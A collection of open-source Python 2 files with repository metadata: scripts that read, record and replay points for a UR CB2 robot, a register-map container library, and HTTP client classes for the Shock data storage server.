epilog="This software is designed to show the status of a UR CB2 Robot."
" Simply run the program with appropriate arguments and it will"
" print useful information about the robot to the terminal."
" If information is not printed nicely, make your terminal "
"larger")
parser.add_argument("--ip", metavar="ip", type=str,
help='IP address of the robot', default="192.168.1.100")
parser.add_argument("--port", metavar="port", type=int,
help='IP port on the robot', default=30003)
args = parser.parse_args()
host = args.ip # The remote host
port = args.port # The same port as used by the server
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM))\
as robot_socket:
robot_socket.connect((host, port))
with cb2_receive.URReceiver(robot_socket, True) as my_ur_receiver:
my_ur_receiver.start()
# some_num = 0
while True:
# print "\n\n" + str(some_num) + "\n\n"
# some_num += 1
time.sleep(.25)
if __name__ == "__main__":
main()
| {
"repo_name": "IRIM-Technology-Transition-Lab/ur_cb2",
"path": "ur_cb2/receive/cb2_receive_example.py",
"copies": "1",
"size": "2728",
"license": "mit",
"hash": 2564842185178229000,
"line_mean": 39.1176470588,
"line_max": 80,
"alpha_frac": 0.6755865103,
"autogenerated": false,
"ratio": 4.229457364341085,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5405043874641086,
"avg_score": null,
"num_lines": null
} |
"""A basic script to move to stored points for a cb2 robot.
Basic Usage: Store points using cb2_store_points.py (cb2-record from the
terminal). Run this script, with commandline args."""
# The MIT License (MIT)
#
# Copyright (c) 2016 GTRC.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import argparse
import cb2_robot
import json
import time
def main():
# Parse in arguments
parser = argparse.ArgumentParser(
description='Replay points from json',
epilog="This software is designed to move a cb2 robot to points which "
"have been previously saved.")
parser.add_argument("-f", "--file", metavar="file", type=str,
help='The file to read data from.',
default="cb2points.json")
parser.add_argument("--ip", metavar="ip", type=str,
help='IP address of the robot', default="192.168.1.100")
parser.add_argument("--port", metavar="port", type=int,
help='IP port on the robot', default=30003)
args = parser.parse_args()
host = args.ip # The remote host
port = args.port # The same port as used by the server
with open(args.file, 'r') as f:
data = json.load(f)
write_time = data['time']
points = data['points']
print 'read in {} points, written at: {}'.format(len(points.keys()),
write_time)
with cb2_robot.URRobot(host, port) as robot:
for number in sorted([int(x) for x in points.keys()]):
robot.add_goal(cb2_robot.Goal(points[str(number)]['joint'], False,
'joint'))
# TODO: this appears to skip the first point!
robot.move_on_stop()
print 'Beginning move: {}'.format(number)
if __name__ == "__main__":
main()
| {
"repo_name": "IRIM-Technology-Transition-Lab/ur_cb2",
"path": "ur_cb2/cb2_move_to_points.py",
"copies": "1",
"size": "2871",
"license": "mit",
"hash": 729776699600088700,
"line_mean": 40.0142857143,
"line_max": 80,
"alpha_frac": 0.6485545106,
"autogenerated": false,
"ratio": 4.209677419354839,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.0008818342151675485,
"num_lines": 70
} |
"""A basic script to store points from a cb2 robot
Basic Usage: Run the script, with commandline args. Press `c` to capture a
point. Press `s` to save and exit."""
# The MIT License (MIT)
#
# Copyright (c) 2016 GTRC.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import socket
import time
import argparse
import cb2_receive
import json
import sys
from contextlib import closing
def main():
# Parse in arguments
parser = argparse.ArgumentParser(
description='Save Points',
epilog="This software is designed to save points from a cb2 robot to a"
" file for future use. Points are saved as both joint and"
" cartesian points to the designated file. Once the program is "
"running, press [c] to capture a point and press [s] to save"
" the file and exit.")
parser.add_argument("-f", "--file", metavar="file", type=str,
help='The file to save data to.',
default="cb2points.json")
parser.add_argument("--ip", metavar="ip", type=str,
help='IP address of the robot', default="192.168.1.100")
parser.add_argument("--port", metavar="port", type=int,
help='IP port on the robot', default=30003)
args = parser.parse_args()
# Check to make sure that we can access the file
try:
f = open(args.file, 'w')
print "Able to access file, closing it now until we are ready for it."
except IOError:
print "Unable to access file, bailing out."
sys.exit("Unable to access file")
f.close()
host = args.ip # The remote host
port = args.port # The same port as used by the server
print 'trying to connect to: {}:{}'.format(host, port)
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM))\
as robot_socket:
robot_socket.connect((host, port))
with cb2_receive.URReceiver(robot_socket, False) as my_ur_receiver:
my_ur_receiver.start()
run = True
point_count = 0
json_dict = dict()
json_dict['time'] = time.time()
json_dict['points'] = dict()
while run:
try:
key_input = str(raw_input('Input:'))
except ValueError:
print ("Input was not valid. You must input either [c] or"
" [s]")
key_input = None
if key_input is not None:
if key_input in ('c', 'C'):
with my_ur_receiver.lock:
json_dict['points'][point_count] = \
{'cartesian': my_ur_receiver.position,
'joint': my_ur_receiver.actual_joint_positions}
point_count += 1
elif key_input in ('s', 'S'):
run = False
else:
print ("Input was not valid. You must input either [c]"
" or [s]")
with open(args.file, 'w') as f:
json.dump(json_dict, f, indent=4)
if __name__ == "__main__":
main()
| {
"repo_name": "IRIM-Technology-Transition-Lab/ur_cb2",
"path": "ur_cb2/receive/cb2_store_points.py",
"copies": "1",
"size": "4270",
"license": "mit",
"hash": -2380545605268792300,
"line_mean": 39.6666666667,
"line_max": 80,
"alpha_frac": 0.5866510539,
"autogenerated": false,
"ratio": 4.34826883910387,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.0009450695421159555,
"num_lines": 105
} |
# A basic set of container classes for register data
# Gordon McGregor gordon.mcgregor@verilab.com
from json import dump, load
from pprint import pprint
__version__ = '0.1a'
class __register_base(object):
def __init__(self, parent, name='undefined'):
self.parent = parent
self.name = name
def __str__(self):
return self.name
def __hash__(self):
return self.__str__().__hash__()
def __dir__(self):
return self.children()
def __iter__(self):
for child in self.children():
yield self.__get_child__(child)
def __repr__(self):
return str(self.children())
def show(self, verbose = False):
info = self.__dir__()
info.sort()
pprint(info)
def children(self):
return self.keys()
def keys(self):
raise RegisterError("Implement keys")
def load_map(map_name):
register_data = load(open(map_name))
return RegisterMap(register_data, map_name.split(".")[0])
class RegisterError(Exception):
def __init__(self, value):
self.value = value
Exception.__init__(self)
def __str__(self):
return repr(self.value)
class RegisterMap:
def __init__(self, register_data, name='undefined'):
self.register_data = register_data
self.name = name
def __dir__(self):
return self.register_blocks()
def __iter__(self):
for block in self.register_blocks():
yield self.__getattr__(block)
def __str__(self):
return self.name
def __hash__(self):
return self.__str__().__hash__()
def __repr__(self):
return str(self.register_blocks())
def __getattr__(self, attr):
if (attr):
if self.is_register_block(attr):
return RegisterBlock(self, attr)
elif self.is_memory(attr):
return Memory(self, attr)
else:
raise RegisterError("Block is unknown "+ attr)
def is_register_block(self, name):
try:
return self.register_data['default_map'][name]['region_type'] == 'register_block'
except:
return False
def is_memory(self, name):
try:
return self.register_data['default_map'][name]['region_type'] == 'memory'
except:
return False
def register_blocks(self):
return self.keys()
def keys(self):
keys = self.register_data['default_map'].keys()
keys.sort()
return keys
class RegisterBlock(__register_base):
def __init__(self, parent, name = 'undefined'):
self.parent = parent
self.register_block_type = self.parent.register_data['default_map'][name]['register_block_type']
self.name = name
def __dir__(self):
return self.registers()
def __iter__(self):
for i in self.registers(numerical_sort=True):
yield self.__get_register(i)
def __get_register(self, name):
return Register(self, self.parent, name)
def __str__(self):
return self.name
def __hash__(self):
return self.__str__().__hash__()
def __repr__(self):
return str(self.registers())
def __getattr__(self, attr):
if self.__class__.__dict__.has_key('is_' + attr):
return getattr(self, 'is_' + attr)()
if self.__class__.__dict__.has_key('get_' + attr):
return getattr(self, 'get_' + attr)()
return self.__get_register(attr)
def get_base(self):
try:
return self.parent.register_data['default_map'][self.name]['base']
except(KeyError):
if not self.parent.register_data(self.name):
raise RegisterError('unknown register block: ' + self.name)
else:
raise RegisterError("register block " + self.name + " has no base entry")
def is_memory(self):
return False
def is_register_block(self):
return True
def registers(self, numerical_sort=False):
try:
data = self.parent.register_data['register_blocks'][self.register_block_type]['registers'].keys()
# if numerical_sort:
# data.sort(cmp = lambda x,y: cmp( Register(self, self.parent, x).get_address(), Register(self, self.parent, y).get_address()) )
# else:
# data.sort()
return data
except(KeyError):
raise RegisterError('unknown register block: ' + self.name)
def keys(self):
try:
return self.parent.register_data['register_blocks'][self.register_block_type].keys()
except(KeyError):
raise RegisterError('unknown register_block: ' + self.name)
class Register(__register_base):
def __init__(self, parent=None, register_map=None, name='undefined'):
self.parent = parent
self.register_map = register_map
self.name = name
def __dir__(self):
return self.fields()
def __iter__(self):
for i in self.fields():
yield self.__get_field(i)
def fields(self):
data = self.register_map.register_data['register_blocks'][self.parent.register_block_type]['registers'][self.name]['fields'].keys()
# data.sort(cmp = lambda x,y: cmp( Field(self, self.parent, self.register_map, x).lsb, Field(self, self.parent, self.register_map, y).lsb) )
return data
def __str__(self):
return '.'.join((self.register_map.name, self.parent.name, self.name))
def __hash__(self):
return self.__str__().__hash__()
def __eq__(self, other):
return self.__str__() == other.__str__()
def __repr__(self):
return str(self.fields())
def __getattr__(self, attr):
# basic dispatcher logic - check for get_'attr'() and is_'attr'() methods
if self.__class__.__dict__.has_key('get_' + attr):
return getattr(self, 'get_' + attr)()
if self.__class__.__dict__.has_key('is_' + attr):
return getattr(self, 'is_' + attr)()
if attr == 'desc':
try:
return self.reg_map_entry['desc'][0]
except(KeyError):
raise RegisterError('unknown register: ' + self.name)
return self.__get_field(attr)
def get_base(self):
return self.parent.get_base()
def __get_field(self, name):
if name in self.fields():
return Field(self, self.parent, self.register_map, name)
else:
raise RegisterError(self.name + ' register does not have a field ' + name)
def get_offset(self):
try:
offset = self.register_map.register_data['register_blocks'][self.register_block.register_block_type][self.name]['offset']
return offset
except(KeyError):
raise RegisterError('unknown register: ' + self.name)
def get_length(self):
return 4 # hack for now - should calculate?
def is_writeable(self):
type = self.get_type()
if type.find("RW") != -1 or type.find("WO") != -1: # anything other than RO is writeable (RW, WOC, WOT)
return True
else:
return False
def is_readable(self):
type = self.get_type()
if type.find("WO") != -1:
return False
else:
return True
def is_memory(self):
return False
def is_register(self):
return True
def get_addr(self):
return self.parent.get_base() + self.get_offset()
class Memory(__register_base):
def __init__(self, parent, name = 'undefined'):
self.parent = parent
self.name = name
def __str__(self):
return self.name
def __iter__(self):
return self
def next(self):
raise StopIteration
def __hash__(self):
return self.__str__().__hash__()
def __repr__(self):
return self.name
def __getattr__(self, attr):
if self.__class__.__dict__.has_key('get_' + attr):
return getattr(self, 'get_' + attr)()
if self.__class__.__dict__.has_key('is_' + attr):
return getattr(self, 'is_' + attr)()
try:
return self.parent.register_data[self.name][attr]
except(KeyError):
raise RegisterError('unknown region: ' + self.name)
def is_memory(self):
return True
def is_register_block(self):
return False
def is_register(self):
return False
def get_base(self):
"""Find the base address for this memory region"""
try:
return self.parent.register_data[self.name]['base']
except(KeyError):
if not self.parent.register_data.has_key(self.name):
raise RegisterError('unknown region: ' + self.name)
else:
raise RegisterError("memory " + self.name + " has no base entry")
# return Field(self, self.parent, self.register_map, name)
class Field(__register_base):
def __init__(self, parent = None, register_block = None, register_map = None, name = 'undefined'):
self.parent = parent
self.register_block = register_block
self.register_map = register_map
self.name = name
def __str__(self):
return '.'.join((self.register_map.name, self.register_block.name, self.parent.name, self.name))
def __hash__(self):
return self.__str__().__hash__()
def __eq__(self, other):
return self.__str__() == other.__str__()
def __repr__(self):
return str(self.__str__())
def __getattr__(self, attr):
if self.__class__.__dict__.has_key('get_' + attr):
return getattr(self, 'get_' + attr)()
if self.__class__.__dict__.has_key('is_' + attr):
return getattr(self, 'is_' + attr)()
try:
return self.get_key(attr)
except(KeyError):
raise RegisterError('unknown field: ' + self.name + ' attr: ' + attr)
def get_valid(self):
try:
ranges = self.get_key('valid')
except(KeyError):
ranges = 'all'
if ranges is 'all':
return ('all', 'all')
else:
return (min(ranges), max(ranges))
def get_lsb(self):
return self.get_key('lsb')
def get_width_format_string(self):
return "0x%%0%dx" % ( (self.get_key('width')+3)/4 )
def get_key(self, attr='lsb'):
return self.register_map.register_data['register_blocks'][self.register_block.register_block_type]['registers'][self.parent.name]['fields'][self.name][attr]
def get_mask(self):
width = self.get_key('width')
lsb = self.get_key('lsb')
mask = 0
for bit in xrange(width):
mask |= (1 << bit)
mask = mask << lsb
return mask
def extract_value(self, value = 0xff):
return (value & self.get_mask()) >> self.get_lsb()
if __name__ == '__main__':
print 'test code here'
register_map = load_map("test_data.json")
block = register_map.bank1
register = block.status
field = block.status.field1
for block in register_map:
if block.is_register_block():
for register in block:
for field in register:
print field
else:
print block, "is memory"
| {
"repo_name": "GordonMcGregor/reg_model",
"path": "reg_data.py",
"copies": "1",
"size": "11699",
"license": "apache-2.0",
"hash": 6011507577058336000,
"line_mean": 28.4685138539,
"line_max": 164,
"alpha_frac": 0.5397042482,
"autogenerated": false,
"ratio": 4.01889385091034,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.505859809911034,
"avg_score": null,
"num_lines": null
} |
"""A basic Shock (https://github.com/MG-RAST/Shock) python access class.
Authors:
* Jared Wilkening
* Travis Harrison
"""
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
import cStringIO
import os
import requests
import urllib
from requests_toolbelt import MultipartEncoder
#-----------------------------------------------------------------------------
# Classes
#-----------------------------------------------------------------------------
class Client:
shock_url = ''
auth_header = {}
token = ''
template = "An exception of type {0} occured. Arguments:\n{1!r}"
methods = { 'get': requests.get,
'put': requests.put,
'post': requests.post,
'delete': requests.delete }
def __init__(self, shock_url, token=''):
self.shock_url = shock_url
if token != '':
self.set_auth(token)
def set_auth(self, token):
self.auth_header = {'Authorization': 'OAuth %s'%token}
def get_acl(self, node):
return self._manage_acl(node, 'get')
def add_acl(self, node, acl, user):
return self._manage_acl(node, 'put', acl, user)
def delete_acl(self, node, acl, user):
return self._manage_acl(node, 'delete', acl, user)
def _manage_acl(self, node, method, acl=None, user=None):
url = self.shock_url+'/node/'+node+'/acl'
if acl and user:
url += '/'+acl+'?users='+urllib.quote(user)
try:
req = self.methods[method](url, headers=self.auth_header)
except Exception as ex:
message = self.template.format(type(ex).__name__, ex.args)
raise Exception(u'Unable to connect to Shock server %s\n%s' %(url, message))
if not (req.ok and req.text):
raise Exception(u'Unable to connect to Shock server %s: %s' %(url, req.raise_for_status()))
rj = req.json()
if not (rj and isinstance(rj, dict) and all([key in rj for key in ['status','data','error']])):
raise Exception(u'Return data not valid Shock format')
if rj['error']:
raise Exception('Shock error %s: %s'%(rj['status'], rj['error'][0]))
return rj['data']
def get_node(self, node):
return self._get_node_data('/'+node)
def query_node(self, query):
query_string = '?query&'+urllib.urlencode(query)
return self._get_node_data(query_string)
def _get_node_data(self, path):
url = self.shock_url+'/node'+path
try:
rget = self.methods['get'](url, headers=self.auth_header)
except Exception as ex:
message = self.template.format(type(ex).__name__, ex.args)
raise Exception(u'Unable to connect to Shock server %s\n%s' %(url, message))
if not (rget.ok and rget.text):
raise Exception(u'Unable to connect to Shock server %s: %s' %(url, rget.raise_for_status()))
rj = rget.json()
if not (rj and isinstance(rj, dict) and all([key in rj for key in ['status','data','error']])):
raise Exception(u'Return data not valid Shock format')
if rj['error']:
raise Exception('Shock error %s: %s'%(rj['status'], rj['error'][0]))
return rj['data']
def download_to_string(self, node, index=None, part=None, chunk=None, binary=False):
result = self._get_node_download(node, index=index, part=part, chunk=chunk, stream=False)
if binary:
return result.content
else:
return result.text
def download_to_path(self, node, path, index=None, part=None, chunk=None):
if path == '':
raise Exception(u'download_to_path requires non-empty path parameter')
result = self._get_node_download(node, index=index, part=part, chunk=chunk, stream=True)
with open(path, 'wb') as f:
for chunk in result.iter_content(chunk_size=8192):
if chunk:
f.write(chunk)
f.flush()
return path
def _get_node_download(self, node, index=None, part=None, chunk=None, stream=False):
if node == '':
raise Exception(u'download requires non-empty node parameter')
url = '%s/node/%s?download'%(self.shock_url, node)
if index and part:
url += '&index='+index+'&part='+str(part)
if chunk:
url += '&chunk_size='+str(chunk)
try:
rget = self.methods['get'](url, headers=self.auth_header, stream=stream)
except Exception as ex:
message = self.template.format(type(ex).__name__, ex.args)
raise Exception(u'Unable to connect to Shock server %s\n%s' %(url, message))
if not (rget.ok):
raise Exception(u'Unable to connect to Shock server %s: %s' %(url, rget.raise_for_status()))
return rget
def delete_node(self, node):
url = self.shock_url+'/node/'+node
try:
req = self.methods['delete'](url, headers=self.auth_header)
rj = req.json()
except Exception as ex:
message = self.template.format(type(ex).__name__, ex.args)
raise Exception(u'Unable to connect to Shock server %s\n%s' %(url, message))
if rj['error']:
raise Exception(u'Shock error %s: %s (%s)'%(rj['status'], rj['error'][0], node))
return rj
def index_node(self, node, index, column=None, force=False):
url = "%s/node/%s/index/%s"%(self.shock_url, node, index)
params = {}
if column is not None:
params['number'] = str(column)
if force:
params['force_rebuild'] = 1
try:
if params:
url += '?'+urllib.urlencode(params)
req = self.methods['put'](url, headers=self.auth_header)
rj = req.json()
except Exception as ex:
message = self.template.format(type(ex).__name__, ex.args)
raise Exception(u'Unable to connect to Shock server %s\n%s' %(url, message))
if rj['error']:
raise Exception(u'Shock error %s: %s (%s)'%(rj['status'], rj['error'][0], node))
return rj
def index_subset(self, node, name, parent, subset_file):
url = "%s/node/%s/index/subset"%(self.shock_url, node)
pdata = {'index_name': name, 'parent_index': parent, 'subset_indices': self._get_handle(subset_file)}
mdata = MultipartEncoder(fields=pdata)
headers = self.auth_header.copy()
headers['Content-Type'] = mdata.content_type
try:
req = self.methods['put'](url, headers=headers, data=mdata, allow_redirects=True)
rj = req.json()
except Exception as ex:
message = self.template.format(type(ex).__name__, ex.args)
raise Exception(u'Unable to connect to Shock server %s\n%s' %(url, message))
if rj['error']:
raise Exception(u'Shock error %s: %s (%s)'%(rj['status'], rj['error'][0], node))
return rj
def copy_node(self, parent_node, attr='', copy_index=True):
url = self.shock_url+'/node'
pdata = {'copy_data': parent_node}
if attr != '':
pdata['attributes'] = self._get_handle(attr)
if copy_index:
pdata['copy_indexes'] = 'true'
mdata = MultipartEncoder(fields=pdata)
headers = self.auth_header.copy()
headers['Content-Type'] = mdata.content_type
try:
req = self.methods['post'](url, headers=headers, data=mdata, allow_redirects=True)
rj = req.json()
except Exception as ex:
message = self.template.format(type(ex).__name__, ex.args)
raise Exception(u'Unable to connect to Shock server %s\n%s' %(url, message))
if rj['error']:
raise Exception(u'Shock error %s: %s'%(rj['status'], rj['error'][0]))
return rj['data']
def create_node(self, data='', attr='', data_name=''):
return self.upload("", data, attr, data_name)
# file_name is name of data file
# form == True for multi-part form
# form == False for data POST of file
def upload(self, node='', data='', attr='', file_name='', form=True):
method = 'post'
files = {}
url = self.shock_url+'/node'
if node != '':
url = '%s/%s'%(url, node)
method = 'put'
if data != '':
files['upload'] = self._get_handle(data, file_name)
if attr != '':
files['attributes'] = self._get_handle(attr)
if form:
mdata = MultipartEncoder(fields=files)
headers = self.auth_header.copy()
headers['Content-Type'] = mdata.content_type
try:
req = self.methods[method](url, headers=headers, data=mdata, allow_redirects=True)
rj = req.json()
except Exception as ex:
message = self.template.format(type(ex).__name__, ex.args)
raise Exception(u'Unable to connect to Shock server %s\n%s' %(url, message))
elif (not form) and data:
try:
req = self.methods[method](url, headers=self.auth_header, data=files['upload'][1], allow_redirects=True)
rj = req.json()
except Exception as ex:
message = self.template.format(type(ex).__name__, ex.args)
raise Exception(u'Unable to connect to Shock server %s\n%s' %(url, message))
else:
raise Exception(u'No data specificed for %s body'%method)
if not (req.ok):
raise Exception(u'Unable to connect to Shock server %s: %s' %(url, req.raise_for_status()))
if rj['error']:
raise Exception(u'Shock error %s: %s%s'%(rj['status'], rj['error'][0], ' ('+node+')' if node else ''))
return rj['data']
# handles 3 cases
# 1. file path
# 2. file object (handle)
# 3. file content (string)
def _get_handle(self, d, n=''):
try:
if os.path.exists(d):
name = n if n else os.path.basename(d)
return (name, open(d))
else:
name = n if n else "unknown"
return (name, cStringIO.StringIO(d))
except TypeError:
try:
name = n if n else d.name
return (name, d)
except:
raise Exception(u'Error opening file handle for upload')
| {
"repo_name": "kbaseIncubator/mock_kbase",
"path": "lib/mock_kbase/clients/shock.py",
"copies": "1",
"size": "10684",
"license": "mit",
"hash": 5915998088704762000,
"line_mean": 41.2292490119,
"line_max": 120,
"alpha_frac": 0.5346312243,
"autogenerated": false,
"ratio": 3.747457032620133,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4782088256920133,
"avg_score": null,
"num_lines": null
} |
"""A basic Shock (https://github.com/MG-RAST/Shock) python access class.
Authors:
* Jared Wilkening
* Travis Harrison
"""
# -----------------------------------------------------------------------------
# Imports
# -----------------------------------------------------------------------------
import cStringIO
import os
import requests
import urllib
# -----------------------------------------------------------------------------
# Classes
# -----------------------------------------------------------------------------
class Client:
shock_url = ""
auth_header = {}
token = ""
template = "An exception of type {0} occured. Arguments:\n{1!r}"
def __init__(self, shock_url, token=""):
self.shock_url = shock_url
if token != "":
self.set_auth(token)
def set_auth(self, token):
self.auth_header = {"Authorization": "OAuth %s" % token}
def get_acl(self, node):
return self._manage_acl(node, "get")
def add_acl(self, node, acl, user):
return self._manage_acl(node, "put", acl, user)
def delete_acl(self, node, acl, user):
return self._manage_acl(node, "delete", acl, user)
def _manage_acl(self, node, method, acl=None, user=None):
url = self.shock_url + "/node/" + node + "/acl"
if acl and user:
url += "/" + acl + "?users=" + urllib.quote(user)
try:
if method == "get":
req = requests.get(url, headers=self.auth_header)
elif method == "put":
req = requests.put(url, headers=self.auth_header)
elif method == "delete":
req = requests.delete(url, headers=self.auth_header)
except Exception as ex:
message = self.template.format(type(ex).__name__, ex.args)
raise Exception(
u"Unable to connect to Shock server %s\n%s" % (url, message)
)
if not (req.ok and req.text):
raise Exception(
u"Unable to connect to Shock server %s: %s"
% (url, req.raise_for_status())
)
rj = req.json()
if not (
rj
and isinstance(rj, dict)
and all([key in rj for key in ["status", "data", "error"]])
):
raise Exception(u"Return data not valid Shock format")
if rj["error"]:
raise Exception("Shock error: %d: %s" % (rj["status"], rj["error"][0]))
return rj["data"]
def get_node(self, node):
return self._get_node_data("/" + node)
def query_node(self, query):
query_string = "?query&" + urllib.urlencode(query)
return self._get_node_data(query_string)
def _get_node_data(self, path):
url = self.shock_url + "/node" + path
try:
rget = requests.get(url, headers=self.auth_header, allow_redirects=True)
except Exception as ex:
message = self.template.format(type(ex).__name__, ex.args)
raise Exception(
u"Unable to connect to Shock server %s\n%s" % (url, message)
)
if not (rget.ok and rget.text):
raise Exception(
u"Unable to connect to Shock server %s: %s"
% (url, rget.raise_for_status())
)
rj = rget.json()
if not (
rj
and isinstance(rj, dict)
and all([key in rj for key in ["status", "data", "error"]])
):
raise Exception(u"Return data not valid Shock format")
if rj["error"]:
raise Exception("Shock error: %d: %s" % (rj["status"], rj["error"][0]))
return rj["data"]
def download_to_string(self, node, index=None, part=None, chunk=None, binary=False):
result = self._get_node_download(
node, index=index, part=part, chunk=chunk, stream=False
)
if binary:
return result.content
else:
return result.text
def download_to_path(self, node, path, index=None, part=None, chunk=None):
if path == "":
raise Exception(u"download_to_path requires non-empty path parameter")
result = self._get_node_download(
node, index=index, part=part, chunk=chunk, stream=True
)
with open(path, "wb") as f:
for chunk in result.iter_content(chunk_size=8192):
if chunk:
f.write(chunk)
f.flush()
return path
def _get_node_download(self, node, index=None, part=None, chunk=None, stream=False):
if node == "":
raise Exception(u"download requires non-empty node parameter")
url = "%s/node/%s?download" % (self.shock_url, node)
if index and part:
url += "&index=" + index + "&part=" + str(part)
if chunk:
url += "&chunk_size=" + str(chunk)
try:
rget = requests.get(url, headers=self.auth_header, stream=stream)
except Exception as ex:
message = self.template.format(type(ex).__name__, ex.args)
raise Exception(
u"Unable to connect to Shock server %s\n%s" % (url, message)
)
if not (rget.ok):
raise Exception(
u"Unable to connect to Shock server %s: %s"
% (url, rget.raise_for_status())
)
return rget
def delete_node(self, node):
url = self.shock_url + "/node/" + node
try:
req = requests.delete(url, headers=self.auth_header)
rj = req.json()
except Exception as ex:
message = self.template.format(type(ex).__name__, ex.args)
raise Exception(
u"Unable to connect to Shock server %s\n%s" % (url, message)
)
if rj["error"]:
raise Exception(u"Shock error %s : %s" % (rj["status"], rj["error"][0]))
return rj
def index_node(self, node, index):
url = "%s/node/%s/index/%s" % (self.shock_url, node, index)
try:
req = requests.put(url, headers=self.auth_header)
rj = req.json()
except Exception as ex:
message = self.template.format(type(ex).__name__, ex.args)
raise Exception(
u"Unable to connect to Shock server %s\n%s" % (url, message)
)
if rj["error"]:
raise Exception(u"Shock error %s : %s" % (rj["status"], rj["error"][0]))
return rj
def create_node(self, data="", attr="", data_name=""):
return self.upload("", data, attr, data_name)
# file_name is name of data file
# form == True for multi-part form
# form == False for data POST of file
def upload(self, node="", data="", attr="", file_name="", form=True):
method = "POST"
files = {}
url = self.shock_url + "/node"
if node != "":
url = "%s/%s" % (url, node)
method = "PUT"
if data != "":
files["upload"] = self._get_handle(data, file_name)
if attr != "":
files["attributes"] = self._get_handle(attr)
if form:
try:
if method == "PUT":
req = requests.put(
url, headers=self.auth_header, files=files, allow_redirects=True
)
else:
req = requests.post(
url, headers=self.auth_header, files=files, allow_redirects=True
)
rj = req.json()
except Exception as ex:
message = self.template.format(type(ex).__name__, ex.args)
raise Exception(
u"Unable to connect to Shock server %s\n%s" % (url, message)
)
elif (not form) and data:
try:
if method == "PUT":
req = requests.put(
url,
headers=self.auth_header,
data=files["upload"][1],
allow_redirects=True,
)
else:
req = requests.post(
url,
headers=self.auth_header,
data=files["upload"][1],
allow_redirects=True,
)
rj = req.json()
except Exception as ex:
message = self.template.format(type(ex).__name__, ex.args)
raise Exception(
u"Unable to connect to Shock server %s\n%s" % (url, message)
)
else:
raise Exception(u"No data specificed for %s body" % method)
if not (req.ok):
raise Exception(
u"Unable to connect to Shock server %s: %s"
% (url, req.raise_for_status())
)
if rj["error"]:
raise Exception(u"Shock error %s : %s" % (rj["status"], rj["error"][0]))
else:
return rj["data"]
# handles 3 cases
# 1. file path
# 2. file object (handle)
# 3. file content (string)
def _get_handle(self, d, n=""):
try:
if os.path.exists(d):
name = n if n else os.path.basename(d)
return (name, open(d))
else:
name = n if n else "unknown"
return (name, cStringIO.StringIO(d))
except TypeError:
try:
name = n if n else d.name
return (name, d)
except BaseException:
raise Exception(u"Error opening file handle for upload")
| {
"repo_name": "kbase/narrative",
"path": "src/biokbase/shock.py",
"copies": "2",
"size": "9732",
"license": "mit",
"hash": 4197090025117141500,
"line_mean": 35.4494382022,
"line_max": 88,
"alpha_frac": 0.4799630086,
"autogenerated": false,
"ratio": 3.9950738916256157,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5475036900225616,
"avg_score": null,
"num_lines": null
} |
"""A basic Shock(https://github.com/MG-RAST/Shock) python access class.
Uses shock-client for high performance uploads and download if it is in
the users path.
Authors:
* Jared Wilkening
* Travis Harrison
"""
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
import cStringIO
import json
import os
import requests
import subprocess
#-----------------------------------------------------------------------------
# Classes
#-----------------------------------------------------------------------------
class Client:
shock_url = ''
transport_method = ''
auth_header = {}
token = ''
def __init__(self, shock_url, token=''):
self.shock_url = shock_url
if token != '':
self.set_auth(token)
if self._cmd_exists('shock-client'):
self.transport_method = 'shock-client'
else:
self.transport_method = 'requests'
def set_auth(self, token):
self.auth_header = {'Authorization': 'OAuth %s'%token}
if self.transport_method == 'shock-client':
self._set_shockclient_auth(token)
def _set_shockclient_auth(self, token):
proc = subprocess.Popen("shock-client auth set-token \'{\"access_token\": \"%s\"}\'"%(token), shell=True, stderr=subprocess.PIPE, stdout=subprocess.PIPE)
return_code = proc.wait()
if return_code > 0:
err = ""
for line in proc.stderr:
err += line
raise Exception(u'Error setting auth token in shock-client: %s'%err)
def get_node(self, node):
url = self.shock_url+'/node/'+node
try:
rget = requests.get(url, headers=self.auth_header, allow_redirects=True)
except Exception as e:
raise Exception(u'Unable to connect to Shock server %s: %s' %(url, e))
